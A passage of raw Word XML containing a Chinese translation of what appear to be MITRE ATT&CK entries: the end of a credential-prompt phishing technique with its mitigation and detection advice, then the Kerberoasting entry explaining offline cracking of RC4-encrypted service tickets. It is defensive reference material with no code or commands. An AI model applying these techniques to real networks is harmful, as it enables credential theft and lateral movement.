        <w:t>绕过用户帐户控制）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19581C28" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00AF7B52">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会模仿此功能，以出于模仿正常使用的多种原因（例如需要额外访问的虚假安装程序或虚假恶意软件删除套件）来提示用户提供具有看似合法提示的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验证信息。</w:t>
      </w:r>
      <w:hyperlink r:id="rId153" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af4"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:color w:val="4F7CAC"/>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:t>[1]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C421E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此类提示可用于通过各种语言</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集数据，例如：</w:t>
      </w:r>
      <w:r w:rsidRPr="004779E1">
        <w:t>AppleScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="004779E1">
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643CF90E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1976"/>
        <w:gridCol w:w="7760"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00872AC7" w14:paraId="13123AD7" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1976" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="122B75B7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00872AC7" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00872AC7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7760" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="284FA8FA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00872AC7" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00872AC7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="004779E1" w14:paraId="69734E33" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1976" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D68108A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId154" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="004779E1">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>用户培训</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7760" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C4F4E14" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用用户培训来提高意识并引发对潜在恶意事件的怀疑（例如：提示输入验证信息的</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Office</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文档）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="078BDAD0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5620B3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="001E51B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监视异常程序的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进</w:t>
      </w:r>
      <w:r w:rsidRPr="001E51B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程执行以及可用于提示用户输入凭据的恶意</w:t>
      </w:r>
      <w:r w:rsidRPr="004779E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52314346" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E51B6">
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>检查并</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>审</w:t>
      </w:r>
      <w:r w:rsidRPr="001E51B6">
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>查非传统指标的输入提示，例如非传统横幅，文本，时间和</w:t>
      </w:r>
      <w:r w:rsidRPr="001E51B6">
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="001E51B6">
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>或来源。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EEC2E0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Kerberoasting</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="1AF60B1C" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50B6DB2C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004779E1">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:t xml:space="preserve"> T1208</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="120311FC" w14:textId="035C883C" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:t>凭据访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AD5B2B6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004779E1">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:t xml:space="preserve"> Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1335B282" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004779E1">
              <w:t>系统要求</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：有效的域帐户或在域中嗅探流量的功能。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E0DD628" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004779E1">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43DD8776" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004779E1">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>事件日志</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24A285EC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004779E1">
              <w:t>贡献者</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:t>: Praetorian</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09F8703A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004779E1">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C14E0D3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7801EC92" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00840670">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>服务主体名称（</w:t>
      </w:r>
      <w:r w:rsidRPr="00840670">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>SPN</w:t>
      </w:r>
      <w:r w:rsidRPr="00840670">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>）用于唯一标识</w:t>
      </w:r>
      <w:r w:rsidRPr="00840670">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00840670">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>服务的每个实例。</w:t>
      </w:r>
      <w:r w:rsidRPr="00840670">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00840670">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>要启用身份验证，</w:t>
      </w:r>
      <w:r w:rsidRPr="00840670">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Kerberos</w:t>
      </w:r>
      <w:r w:rsidRPr="00840670">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>要求</w:t>
      </w:r>
      <w:r w:rsidRPr="00840670">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>SPN</w:t>
      </w:r>
      <w:r w:rsidRPr="00840670">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>与至少一个服务登录帐户（专门负责运行服务的帐户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>）相关联。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDD88DC" w14:textId="67CCC5D7" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00840670">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>拥有有效</w:t>
      </w:r>
      <w:r w:rsidRPr="00840670">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Kerberos</w:t>
      </w:r>
      <w:r w:rsidRPr="00840670">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>票证授予票证（</w:t>
      </w:r>
      <w:r w:rsidRPr="00840670">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>TGT</w:t>
      </w:r>
      <w:r w:rsidRPr="00840670">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>）的攻击者可以从域控制器（</w:t>
      </w:r>
      <w:r w:rsidRPr="00840670">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>DC</w:t>
      </w:r>
      <w:r w:rsidRPr="00840670">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>）请求任何</w:t>
      </w:r>
      <w:r w:rsidRPr="00840670">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>SPN</w:t>
      </w:r>
      <w:r w:rsidRPr="00840670">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>的一个或多个</w:t>
      </w:r>
      <w:r w:rsidRPr="00840670">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Kerberos</w:t>
      </w:r>
      <w:r w:rsidRPr="00840670">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>票证授予服务（</w:t>
      </w:r>
      <w:r w:rsidRPr="00840670">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>TGS</w:t>
      </w:r>
      <w:r w:rsidRPr="00840670">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00840670">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>服务票证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00840670">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>这些票证的一部分可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00840670">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>RC4</w:t>
      </w:r>
      <w:r w:rsidRPr="00840670">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>算法加密，这意味着与</w:t>
      </w:r>
      <w:r w:rsidRPr="00840670">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>SPN</w:t>
      </w:r>
      <w:r w:rsidRPr="00840670">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>关联的服务帐户的</w:t>
      </w:r>
      <w:r w:rsidRPr="00840670">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Kerberos 5 TGS-REP etype 23</w:t>
      </w:r>
      <w:r w:rsidRPr="00840670">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>哈希被用作私钥，因此容易受到可能暴露明文</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="00840670">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>的离线</w:t>
      </w:r>
      <w:r w:rsidRPr="004779E1">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>暴力破解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D84872" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00837397">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>可以使用从网络流量捕获的服务票据来执行相同的攻击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5960263D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>被</w:t>
      </w:r>
      <w:r w:rsidRPr="00837397">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>破解的哈希可以通过访问</w:t>
      </w:r>
      <w:r w:rsidRPr="004779E1">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有效账户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>启</w:t>
      </w:r>
      <w:r w:rsidRPr="00837397">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>用持久</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>化</w:t>
      </w:r>
      <w:r w:rsidRPr="00837397">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>，权限提升和横向移动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A7D06B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1976"/>
        <w:gridCol w:w="7760"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="004779E1" w14:paraId="0F6AB391" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1976" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="38F3860B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
